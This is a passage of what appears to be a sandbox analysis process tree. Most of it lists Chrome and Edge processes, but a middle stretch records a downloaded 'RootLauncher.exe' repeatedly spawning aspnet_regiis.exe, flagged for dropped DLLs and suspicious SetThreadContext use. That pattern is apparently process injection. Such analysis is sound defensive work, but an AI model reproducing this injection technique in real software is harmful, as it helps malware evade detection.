  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:7500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:2644
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:6864
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ff746924698,0x7ff7469246a4,0x7ff7469246b0
    3⤵
    - Drops file in Program Files directory
    PID:6296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3240,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:5624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4328,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  PID:4016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5352,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3120 /prefetch:8
  2⤵
  - Modifies registry class
  PID:6620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5392,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:3488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4608,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:7316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=212,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:7896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3324,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5368,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5188,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5556 /prefetch:1
  2⤵
  PID:7504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3148,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5548,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3680,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1808 /prefetch:2
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3336,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  PID:1972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5676,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5932,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:3712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6052,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:8096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3380,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2000 /prefetch:2
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5608,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5976 /prefetch:1
  2⤵
  PID:8140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=3152,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=3368,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:3092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=3844,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6272 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6016,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3840 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=4892,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3816 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2112,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3964 /prefetch:2
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6148,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6128 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:7752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6124,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4396 /prefetch:1
  2⤵
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6264,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3976 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=3396,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:5232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=6376,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6252 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:7680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=2028,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6108 /prefetch:1
  2⤵
  PID:4952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=3780,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:7900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=5996,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:8084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6044,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5532 /prefetch:1
  2⤵
  PID:6084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=5844,i,14439458091491692491,13812390838189088953,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:5816

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4512

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:8176
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4128

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2952
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2328

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2920
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6232

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3528
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5308

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2324
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6708

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1492
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6836

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4988
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6448

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2916
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3736

C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe
"C:\Users\Admin\Downloads\RootSoftware\RootSoftware\RootLauncher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1336
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7968

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:5876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:7048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd67f2cc40,0x7ffd67f2cc4c,0x7ffd67f2cc58
  2⤵
  PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,16906517477001326230,9536530017384358369,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:6928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,16906517477001326230,9536530017384358369,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
  2⤵
  PID:6816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,16906517477001326230,9536530017384358369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16906517477001326230,9536530017384358369,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16906517477001326230,9536530017384358369,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
  2⤵
  PID:5572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
PID:7276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
  2⤵
  PID:6524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,8625989270753956509,8450206735559342664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
  2⤵
  PID:7192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,8625989270753956509,8450206735559342664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 /prefetch:3
  2⤵
  PID:3668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,8625989270753956509,8450206735559342664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,8625989270753956509,8450206735559342664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
